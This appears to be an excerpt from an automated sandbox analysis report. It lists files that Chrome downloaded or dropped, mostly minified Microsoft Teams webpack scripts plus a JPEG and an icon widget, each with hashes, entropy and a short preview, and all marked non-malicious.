                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):27548
                                                                                                                                                                                                                          Entropy (8bit):5.276558233916037
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:768:4zEhQ+dP4/T1f0FE0/9wQsry3HFpNKD2jlVHm09St/d6ruCzL2Mli3:oEhQcoCzLE
                                                                                                                                                                                                                          MD5:E5C8794E3EFF94D66DFA98E07E6AD2A0
                                                                                                                                                                                                                          SHA1:906B6E540FEE1049A87749643D40A7BF8C70BE5E
                                                                                                                                                                                                                          SHA-256:965858E2CE33018A3D630ABFCE455CD4F9C5D5E8EF36F3C53E9C962706158097
                                                                                                                                                                                                                          SHA-512:69A3D69997BC3D0CBB5244235390C79124E9DB42A334850B0B2F90D682BFDC4E6C405F3655E1756A6A59678A0073EC8D86A0A330C56D592E22C58143182416B4
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/387552-d458b7b8f456ca9b.js
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[387552],{28932:(e,t,n)=>{n.d(t,{x:()=>i});const i={0:"OngoingCall",OngoingCall:0,1:"Meeting",Meeting:1,2:"OneToOneCall",OneToOneCall:2,3:"GroupCall",GroupCall:3,4:"AgentMonitorSession",AgentMonitorSession:4}},588534:(e,t,n)=>{var i;n.d(t,{R:()=>i}),function(e){e.ReplyChain="ReplyChain",e.CallHistory="CallHistory",e.CallHistoryDoubleClick="CallHistoryDoubleClick",e.ContactsTab="ContactsTab",e.Dialpad="Dialpad",e.DialpadWithPeoplePicker="DialpadWithPeoplePicker",e.ExchangeContactsTab="ExchangeContactsTab",e.EchoBotCall="EchoBotCall",e.Voicemail="Voicemail",e.RetryCall="RetryCall",e.RejoinCall="RejoinCall",e.RetryCallFromChildWindow="RetryCallFromChildWindow",e.RejoinCallFromChildWindow="RejoinCallFromChildWindow",e.CallingAnonMeetingEndScreen="CallingAnonMeetingEndScreen",e.HIDTriggered="HIDTriggered",e.HIDTriggeredAccept="hidtriggered_accept",e.HIDTriggeredVoipAccept="hidtrigg
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):110335
                                                                                                                                                                                                                          Entropy (8bit):5.0224307005678686
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:1536:d6Pum++emT9O0I5m6w6HFKDKElAimnjHzv01CRi59+8VQ6KmP:d6PuIeqO1m6w6UROHzv01CRiXvKmP
                                                                                                                                                                                                                          MD5:214D956E3CCEB03D45BA8EEF688CC64B
                                                                                                                                                                                                                          SHA1:051A81084C125E846CBF96F6159E8CF2814313ED
                                                                                                                                                                                                                          SHA-256:8C834B7132470B8E36679CF844F38CB6B9C3B3177B9DB0261408366BD4618828
                                                                                                                                                                                                                          SHA-512:147C8514367795C09E7DE87B50846202B38B86FBAB4F69B9C94C96877BEEC997637C0CE175CAB23D1B870C39D35B2203685ABE747E2BCBC089FFB27A698EF049
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/364713-3b9c2490aac0a041.js
                                                                                                                                                                                                                          Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[364713],{450787:(t,e,a)=>{"use strict";a.d(e,{I:()=>i});var s=a(554186);class i{constructor(){this._id=(0,s.v4)(),this._dispose=null,this._data={}}get id(){return this._id}get data(){return this._data}set proximitySource(t){this._data["MeetingRoom.proximitySource"]=t}set alertName(t){this._data["DataBag.alertName"]=t}set allAliasesTurnedOff(t){this._data["DataBag.allAliasesTurnedOff"]=t}set allAliasesWithPrivateVisibility(t){this._data["DataBag.allAliasesWithPrivateVisibility"]=t}set tabAppCount(t){this._data["DataBag.tabAppCount"]=t}set appId(t){this._data["DataBag.appId"]=t}set appInstallScope(t){this._data["DataBag.appInstallScope"]=t}set appStoreOriginSource(t){this._data["DataBag.appStoreOriginSource"]=t}set isUserPartOfMeetingAttendeesCount(t){this._data["DataBag.activeCallsCount"]=t}set setIsMeetingGame(t){this._data["DataBag.isMeetingGame"]=t}set autoreconnectShown(t){this._data["
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], baseline, precision 8, 19x21, components 3
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):669
                                                                                                                                                                                                                          Entropy (8bit):5.687700387379596
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:12:SPb3SkEl9qvc150XyoseWlwqTIB5aSAgoPq7Z2TF8:/l8vc1spWJIDaRxG
                                                                                                                                                                                                                          MD5:3A6D11202EF8909AFDB634F33997F45C
                                                                                                                                                                                                                          SHA1:71C160699266293EFDFC308DC87F03C2B3E39A62
                                                                                                                                                                                                                          SHA-256:3B943E8B80AB9EE7FD4FB040BFB274F8FBE44A3FB33087A13B06DB74E3C316F8
                                                                                                                                                                                                                          SHA-512:4318169AC5F7047F85771DAD9DD34F50BC5CAD2815329027C80CA7C77FEB35F8C7B7F001390C4CBA928D3EED0830A417EBEA2327F6EE795E7270B23C044D8AC6
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:......Exif..II*...........................V...........^...(.......................i.......f.......8c......8c................0210....................0100...........................................C.....................................%...#... , #&')*)..-0-(0%()(...C...........(...((((((((((((((((((((((((((((((((((((((((((((((((((...........".....................................+........................!."1...#$BCSt...............................)........................!....QARSr.................?.....x....z.b...@:..#.1x.....`........d.Ii..A..t..r.....L.......l..z..'k.z..4.3&..8R..gdv.s.UM..e.'}......=....z.`.....J.W9....EZ.\S.[..(...F...... ...q_..
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (62375), with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):73859
                                                                                                                                                                                                                          Entropy (8bit):5.5092296140052985
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:1536:lCth9qrU23xkE6VvHlGxtY+vo1XPuGxIJ:c2BkEKok+voESIJ
                                                                                                                                                                                                                          MD5:F9CFAD83CEA140B7C8BFCD7234676ED4
                                                                                                                                                                                                                          SHA1:061A52298D46B62598CAB7959FC11D58A548362E
                                                                                                                                                                                                                          SHA-256:A6DBF4B85629437AD65DBFDD733C99ED566893FBC599C8CAAC0B015C73F471B8
                                                                                                                                                                                                                          SHA-512:A1C72677FCDA27DAD02CB6A935411D863C38FF8A3E76B88685EE88FDE77E68902F79A4302749405EFF8E9D809395308DCB81E7E639206AFD83E87EEE25D7C3B1
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[710639],{861782:(t,e,r)=>{var i=r(8605),s=r(548738),n={__proto__:null,style:!0,script:!0,xmp:!0,iframe:!0,noembed:!0,noframes:!0,plaintext:!0,noscript:!0};var a={__proto__:null,area:!0,base:!0,basefont:!0,br:!0,col:!0,command:!0,embed:!0,frame:!0,hr:!0,img:!0,input:!0,isindex:!0,keygen:!0,link:!0,meta:!0,param:!0,source:!0,track:!0,wbr:!0},o=t.exports=function(t,e){Array.isArray(t)||t.cheerio||(t=[t]),e=e||{};for(var r="",s=0;s<t.length;s++){var n=t[s];"root"===n.type?r+=o(n.children,e):i.isTag(n)?r+=c(n,e):n.type===i.Directive?r+=h(n):n.type===i.Comment?r+=p(n):n.type===i.CDATA?r+=u(n):r+=l(n,e)}return r};function c(t,e){"svg"===t.name&&(e={decodeEntities:e.decodeEntities,xmlMode:!0});var r="<"+t.name,i=function(t,e){if(t){var r,i="";for(var n in t)i&&(i+=" "),i+=n,(null!==(r=t[n])&&""!==r||e.xmlMode)&&(i+='="'+(e.decodeEntities?s.encodeXML(r):r)+'"');return i}}(t.attribs,e);return i&&(r
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (23843)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):23950
                                                                                                                                                                                                                          Entropy (8bit):5.2873236427167285
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:384:d7gaa9LSV5yrS0SWSCSYSLSyO/OU/poVLvtmK6bzrCzfLxpBsxc07I2Bd:JgaAuV5fJljWyypoVL1mK6bzWzfn07Iq
                                                                                                                                                                                                                          MD5:0CD128F474BDB7DF9CBF23434A5AEF84
                                                                                                                                                                                                                          SHA1:A1C47BCD629EA66EF894708F616A46A282739FA4
                                                                                                                                                                                                                          SHA-256:625BF36E9521DE1869ACA6B774360102690962CE3860D8AE6E6FC0A8CAC14305
                                                                                                                                                                                                                          SHA-512:9E130DD780FBEF887C2ECC7EEB17A9CD52DACAAE7D44C604CA5C95EC9F5D3E5701BD8D54F1EA0ACE9C740D83BE9462BFF769AF9B64A32AF7C7B00FEEFBE68736
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/34655-d47d0d947ba2b72d.js
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[34655],{34655:(e,t,r)=>{r.d(t,{TL:()=>a,XY:()=>n,f2:()=>s,O4:()=>d,LD:()=>l,sj:()=>c,Ir:()=>C,lQ:()=>T,J2:()=>u,dy:()=>E,c1:()=>S,Kw:()=>I,N2:()=>m,Vx:()=>p,Xn:()=>A,Xk:()=>v,qj:()=>R,ak:()=>D,mA:()=>g,JN:()=>k,ow:()=>L,Tl:()=>F,XK:()=>U,Mh:()=>O});var a,i,n,o=r(724801);!function(e){e[e.Presenting=0]="Presenting",e[e.InCall=1]="InCall",e[e.InBroadcast=2]="InBroadcast",e[e.Interactive=3]="Interactive",e[e.Inactive=4]="Inactive",e[e.LongInactive=5]="LongInactive",e[e.Disabled=6]="Disabled",e[e.Disconnected=7]="Disconnected",e[e.Offline=8]="Offline",e[e.Uninitialized=9]="Uninitialized"}(a||(a={})),function(e){e.AppLogout="appLogout"}(i||(i={})),function(e){e[e.error=0]="error",e[e.warn=1]="warn",e[e.info=2]="info",e[e.verbose=3]="verbose"}(n||(n={}));const s={second:1e3,minute:6e4,tenMinutes:6e5};var d,l,c,C;!function(e){e.Deserialization="Deserialization",e.Unknown="Unknown",e.
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (65514), with no line terminators
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):125493
                                                                                                                                                                                                                          Entropy (8bit):4.875862681395315
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:3072:af4nJeG7LqUsvynksIdyIYtNUt+rWO5nSRL1lhDytWLaGDAB0kLpVeL0wlyFZ6Y0:9nSRL1lhDytWLaGDAB0kLpV+zb3j
                                                                                                                                                                                                                          MD5:C04C10249202E2D4F4090C8BA60D433D
                                                                                                                                                                                                                          SHA1:71E1B5E7011104CC1E594386C41E71A47FF2A7B8
                                                                                                                                                                                                                          SHA-256:13C8398D6EF09B3BEB13273843E002915C46F34D6090ACFC863CABF8C6B2BEF3
                                                                                                                                                                                                                          SHA-512:36094687C546C72B22A92DDD25C40FE1243D2FC6DAB5F348BB7E35CA64A38CC257016327E8855A20C9695B7417C1961A51FEBDF46490C2A8C7918D14C20B2833
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/calendar-locale-en-us-f89bbb2143811669.js
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[525549],{557681:(e,t,a)=>{a.r(t),a.d(t,{default:()=>n});const n={namespace:"calendar",locale:"en-us",translations:{and_separator_format:"{{value1}} and {{value2}}",aria_label_new_event_action_buttons:"Create and schedule",attendance_report_tab_text:"Attendance",breakout_rooms_tab_text:"Breakout rooms",breakout_rooms_tab_text_preview:"Breakout rooms (Preview)",broadcast_meeting_text:"Live event",broadcast_object_download_title_format:"Download {{meetingObjectName}}",broadcast_objects_recording_transcript:"Recordings & Transcripts",broadcast_objects_transcript:"Transcript",broadcast_scheduling_meeting_duration_limit_tooltip:"You can broadcast to attendees for no more than {{maxMeetingDuration}} hours",calendar_RSVP:"RSVP",calendar_accepted:"Accepted",calendar_access_error_message:"Teams is unable to access your Calendar",calendar_access_error_secondary_message:"Share the error
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (45648)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):45756
                                                                                                                                                                                                                          Entropy (8bit):5.2858332742140535
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:768:cYSBClBRobRhWi66Ue2zWDm29skdvjWtqa/:sBcot+/3Gl9sk9j1O
                                                                                                                                                                                                                          MD5:9B765778CB780454FA7573AF688508EF
                                                                                                                                                                                                                          SHA1:63A180A192017925F9D8B7C75992C94D597B8A61
                                                                                                                                                                                                                          SHA-256:B8B6D274F481B81DE9E0BF1A9891133DF8848DED39376CC6AA5CECA455CD3E7F
                                                                                                                                                                                                                          SHA-512:73A25A2BF82DCC41D057BE697305463863EEE7704590CFDDF00B271AEE2630233F10FB94C3928FD132D31475E1A3C1CDFCA5DA4BC3F1EDA9C68B37E5953662DD
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[320494],{320494:(e,t,n)=>{n.d(t,{ms:()=>Ge,Hu:()=>Qe,ik:()=>Ue});var o=n(150321),r=n(89968),i=n(29213),a=n.n(i),s=n(200727),l=n.n(s),u=n(61997),c=n.n(u),d=n(445299),p=n.n(d),f=n(883343),h=n.n(f),g=n(112882),m=n.n(g),v=n(109161),y=n.n(v),I=n(565316),b=n.n(I),w=n(189544),C=n.n(w),S=n(848870),x=n.n(S),P=n(37838),k=n.n(P),O=n(26084),A=n.n(O),E=n(996665),D=n(301078),T=n(152450),R=n(121121),_=n(799323),H=n(31828),K=n(182812),M=n(338400),N=n(900046),B=n(992758),V=n(936666),L=n(953543),j=n(182227),F=n(513432),Q=n(62600),U=n.n(Q),G=n(395225),J=n.n(G),W=n(770246),z=n(786244),Z=n(90278),q=(n(164391),0);function X(e){return"function"==typeof e?e:$}function $(){}function Y(e,t){null!==e&&(0,W.A)(e,{boundary:t,block:"nearest",scrollMode:"if-needed"}).forEach((function(e){var t=e.el,n=e.top,o=e.left;t.scrollTop=n,t.scrollLeft=o}))}function ee(e,t){return e===t||e.contains&&e.contains(t)}fun
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (15497)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):15605
                                                                                                                                                                                                                          Entropy (8bit):5.468955649965476
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:384:iRd8EabA2j7TJISNhQjujjO0/Iu6pAbONOzBo:m8EablPNhhKWIu6pAb26o
                                                                                                                                                                                                                          MD5:0CF2320C179556FD02BCA7E4334F4C89
                                                                                                                                                                                                                          SHA1:967BA55ED9AF744BB82DDD432062B437645BEF0E
                                                                                                                                                                                                                          SHA-256:0EE917F8133E6C98FED6879B31C9AC36FED5BDD6BDE6BFA4EFE2ECFCC538B148
                                                                                                                                                                                                                          SHA-512:E16F8D6D543704AABBED9184EDF536C736099F22699888E548ABE5509D123B7110C3116706F16E52E7CB173A712FDC1B3D7D23336D9A696C5DF54DB5240D5662
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/221963-5e2af34f8bc6a49a.js
                                                                                                                                                                                                                          Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[221963,693593],{996411:(e,t,r)=>{"use strict";r.d(t,{A:()=>p});var n=r(749045),i=r(930591),o=r(207562),s=r(717798),a=r(151820),l=r(714907),u=function(e,t){return(0,i.VF)(function(e,t){var r=-1,n=44;do{switch((0,i.Sh)(n)){case 0:38===n&&12===(0,i.se)()&&(t[r]=1),e[r]+=(0,i.Cv)(i.G1-1);break;case 2:e[r]+=(0,i.Tb)(n);break;case 4:if(44===n){e[++r]=58===(0,i.se)()?"&\f":"",t[r]=e[r].length;break}default:e[r]+=(0,o.HT)(n)}}while(n=(0,i.K2)());return e}((0,i.c4)(e),t))},c=new WeakMap,d=function(e){if("rule"===e.type&&e.parent&&e.length){for(var t=e.value,r=e.parent,n=e.column===r.column&&e.line===r.line;"rule"!==r.type;)if(!(r=r.parent))return;if((1!==e.props.length||58===t.charCodeAt(0)||c.get(r))&&!n){c.set(e,!0);for(var i=[],o=u(t,i),s=r.props,a=0,l=0;a<o.length;a++)for(var d=0;d<s.length;d++,l++)e.props[l]=i[a]?o[a].replace(/&\f/g,s[d]):s[d]+" "+o[a]}}},f=function(e){if("decl"===e.type){var
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (14156)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):14264
                                                                                                                                                                                                                          Entropy (8bit):5.4947284760221144
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:384:+u7P/rlu7U3YHcmZI6hvOZwXP/y7wltBRZNQmdeuKdRX+bH/Eq+iWs8iV9+3:+KP/rlKU3YH7I6xOZSy8lrByuKdgbH/k
                                                                                                                                                                                                                          MD5:256ED7E30F9976F4FEEB07EFC1F550B9
                                                                                                                                                                                                                          SHA1:4C46E9AEB09277E67CD9E58BE8420CA8E731136D
                                                                                                                                                                                                                          SHA-256:2B963A7C1BFB48794672A34F7FE9FFFD06A05BE6C11C32D1BB7012F15116442C
                                                                                                                                                                                                                          SHA-512:AC6BC58C03C1E8CBED4B283D07B11CBC3B774BDF915F7DF8D9EBD7BCC70EB0FD71DE80009F24CC442255F5EB55BCDD2CA1FACFDE3006B708E194DE7514696273
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/224109-b008f1b0861e9cd6.js
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[224109],{263821:(e,t,o)=>{o.d(t,{R:()=>m});var n=o(513432),l=o(164093),a=o(250452);var r=o(644525),s=o(854130);var i=o(103735),c=o(526521);const f="fui-DialogBody",u=(0,i.D)("r1h3qql9",null);var d=o(35871);const m=n.forwardRef(((e,t)=>{const o=((e,t)=>{var o;return{components:{root:"div"},root:l.Gk((0,a.g)(null!==(o=e.as)&&void 0!==o?o:"div",{ref:t,...e}),{elementType:"div"})}})(e,t);return(e=>{const t=u();e.root.className=(0,c.z)(f,t,e.root.className)})(o),(0,d.useCustomStyleHook_unstable)("useDialogBodyStyles_unstable")(o),(e=>((0,s.C)(e),(0,r.Y)(e.root,{})))(o)}));m.displayName="DialogBody"},951195:(e,t,o)=>{o.d(t,{C:()=>m});var n=o(513432),l=o(164093),a=o(250452);var r=o(644525),s=o(854130);var i=o(103735),c=o(526521);const f="fui-DialogContent",u=(0,i.D)("r1v5zwsm",null);var d=o(35871);const m=n.forwardRef(((e,t)=>{const o=((e,t)=>{var o;return{components:{root:"div"},ro
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (22831)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):22939
                                                                                                                                                                                                                          Entropy (8bit):5.352894727770317
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:384:YTxPvTzTOTsTcvJKWTRvxbiTPB2mcnQAi4XX0Q5km3cGfEVc53+qg4zfLBJwzVoR:mVHoS+Qrm3cGIc53K8tJwxoNnuIa53Vi
                                                                                                                                                                                                                          MD5:F70ED4AA684362939A4094E73EE14654
                                                                                                                                                                                                                          SHA1:41C54AD9CF605653A08C49BB3255CB84EFC7AC17
                                                                                                                                                                                                                          SHA-256:3F657976EC0B0E25DF25837FF6F97BF1EEED866950779CF0BF1B672C9154EAE4
                                                                                                                                                                                                                          SHA-512:106F239C6BA71AEE702DE05A95621AD0858AC65658A3C2462B2E3FD2AC8A9C862578D94AB64CF8EFB7714CB0CE259601147DE180FF97A5E1533BD62BCD6DF8F7
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/459872-6142424fcf6e95ed.js
                                                                                                                                                                                                                          Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[459872],{150321:(e,t,n)=>{"use strict";function r(){return r=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var n=arguments[t];for(var r in n)Object.prototype.hasOwnProperty.call(n,r)&&(e[r]=n[r])}return e},r.apply(this,arguments)}n.d(t,{A:()=>r})},90278:(e,t,n)=>{"use strict";n.d(t,{A:()=>o});var r=n(876653);function o(e,t){e.prototype=Object.create(t.prototype),e.prototype.constructor=e,(0,r.A)(e,t)}},89968:(e,t,n)=>{"use strict";function r(e,t){if(null==e)return{};var n,r,o={},i=Object.keys(e);for(r=0;r<i.length;r++)n=i[r],t.indexOf(n)>=0||(o[n]=e[n]);return o}n.d(t,{A:()=>r})},876653:(e,t,n)=>{"use strict";function r(e,t){return r=Object.setPrototypeOf?Object.setPrototypeOf.bind():function(e,t){return e.__proto__=t,e},r(e,t)}n.d(t,{A:()=>r})},353410:(e,t,n)=>{"use strict";function r(e,t){var n=Boolean(t.getRootNode&&t.getRootNode().host);if(e.contai
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (2234)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):2342
                                                                                                                                                                                                                          Entropy (8bit):4.777133342218861
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:48:wp3sp3Lk0T3xl2DkuBuXLgQhsrrzb3fYosOVeCL1TworW7kFAQq:Vk02Dpcbh4rzDFVxpTwn0xq
                                                                                                                                                                                                                          MD5:934D2952A100D5FD1D5400A7DC870E88
                                                                                                                                                                                                                          SHA1:EC89C116E3D50D06BFDCB31CC2A3A4DC0F5BF87A
                                                                                                                                                                                                                          SHA-256:FBC293508A37DD05FDF4D716E965E6831920B4D76C0BB95A1E5BF621BF132976
                                                                                                                                                                                                                          SHA-512:A66A0213EAE6770956267802272180569F3EC79A3E8A4A967B25E4C0890D78E35E46E77526FAF390609FCD02FFCEAD0DB8083181158A5BE6E93012559D9794D5
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[428348],{428348:(e,L,a)=>{a.d(L,{s:()=>n});var s=a(513432),t=a(395225),C=a.n(t),l=a(485529),c=a(829289),n=(0,l.Ke)({svg:function(e){var L=e.classes;return s.createElement("svg",{role:"presentation",focusable:"false",viewBox:"2 2 16 16",className:L.svg},s.createElement("path",{className:C()(c.Q.outline,L.outlinePart),d:"M15.5 16.9989C15.7761 16.9989 16 17.2227 16 17.4989C16 17.7443 15.8231 17.9485 15.5899 17.9908L15.5 17.9989H4.5C4.22386 17.9989 4 17.775 4 17.4989C4 17.2534 4.17688 17.0493 4.41012 17.0069L4.5 16.9989H15.5ZM10.0001 2.0011C10.2456 2.0011 10.4497 2.1781 10.492 2.41137L10.5 2.50124L10.496 14.2951L14.1414 10.6468C14.3148 10.473 14.5842 10.4535 14.7792 10.5883L14.8485 10.6461C15.0222 10.8195 15.0418 11.0889 14.907 11.2839L14.8492 11.3532L10.3574 15.8532C10.285 15.9259 10.1957 15.9715 10.1021 15.9902L9.99608 16C9.83511 16 9.69192 15.9239 9.60051 15.8057L5.14386 11.35
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (22335)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):22398
                                                                                                                                                                                                                          Entropy (8bit):4.5557429273086845
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:384:7EuK/6kvTqLDwd24bXXyiAhSs1hiAhAiSeG3dvBRUqSMkc6u:ouJ5MA4DXc1+ipG3TzSMk0
                                                                                                                                                                                                                          MD5:C44EBBB1C5CC623F903B5EC3F9C94E13
                                                                                                                                                                                                                          SHA1:C1B02B25117E84CC994936D034A3B02D0E6C28DC
                                                                                                                                                                                                                          SHA-256:2C0B8B1B44960FA5584FB5D8F1BB50E21662EC06A70FCA8EEDF8299C69F2E2BA
                                                                                                                                                                                                                          SHA-512:8049E19C0A08A1504B539D34BBBEB642B651CE49B3B5AC2C585E6796CA9CCE6E6A9593094EEECFC8E00E9D30F19EE27743A33E24D6DBDC840E7CBACDBE057DF3
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://img1.wsimg.com/blobby/go/static/radpack/@widget/LAYOUT/c/bs-defaultSocialIconPack-a2c518b6.js
                                                                                                                                                                                                                          Preview:define("@widget/LAYOUT/c/bs-defaultSocialIconPack-a2c518b6.js",["exports"],(function(a){"use strict";const e=(global.React||guac.react).createElement("path",{d:"M12 2C6.477 2 2 6.477 2 12s4.477 10 10 10 10-4.477 10-10A10 10 0 0 0 12 2zM7.055 13.745a.97.97 0 0 1-.073-.509l.182-2.072a.687.687 0 0 1 .29-.364c.182-.11.582.036.582.036l2.619 1.31s.4.181.4.509c-.037.436-.219.436-.364.509l-3.055.654s-.436.146-.581-.073zm4.945.473l-.036 3.018s.036.437-.219.51c-.144.02-.291.02-.436 0l-2.036-.655a.6.6 0 0 1-.291-.364c-.073-.218.182-.545.182-.545l2.036-2.255s.327-.29.582-.145c.254.145.254.436.218.436zm-.364-3.236a.687.687 0 0 1-.581-.182l-2.51-3.418s-.363-.4-.181-.691a.64.64 0 0 1 .363-.291l2.4-.873c.11-.036.218-.145.582.073.255.145.291.655.291.655l.036 4.145s-.072.51-.4.582zm1.419.582l1.636-2.582s.145-.364.436-.327c.152.002.29.085.364.218l1.382 1.636a.676.676 0 0 1 .072.473c-.072.218-.472.363-.472.363l-2.91.837s-.4.073-.545-.182c-.145-.255 0-.51.037-.436zm3.781 3.309L15.6 16.655a.815.815 0 0 1-.4
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (65520), with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):71376
                                                                                                                                                                                                                          Entropy (8bit):5.384960751161495
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:1536:NA+42TMvsS+6ZDuPNlZVsqHbbeEty5EFwv4oWqDX/mSN/H8T7R1tM:p4sShZDacSFRoWqDX/mSN/H8T7R1tM
                                                                                                                                                                                                                          MD5:F3BA70937459B1C801D859B2EBEB3ACB
                                                                                                                                                                                                                          SHA1:1D153EF9FFB8FF824E9C40F74B9E1953D6497B73
                                                                                                                                                                                                                          SHA-256:AF70DE25B485721A15C05BF2A5DA0C7CC912B8A9A02AC000AA304A507E488171
                                                                                                                                                                                                                          SHA-512:90BB3978067903FCC4137D4AA1EEB4369C6EDD88C0BFCBBBE57876ACA2BA23AC446C24AA40F7DF3B1503B1DDE23B1D9230FD18BAC0345C5B83CD7F608DB336DD
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
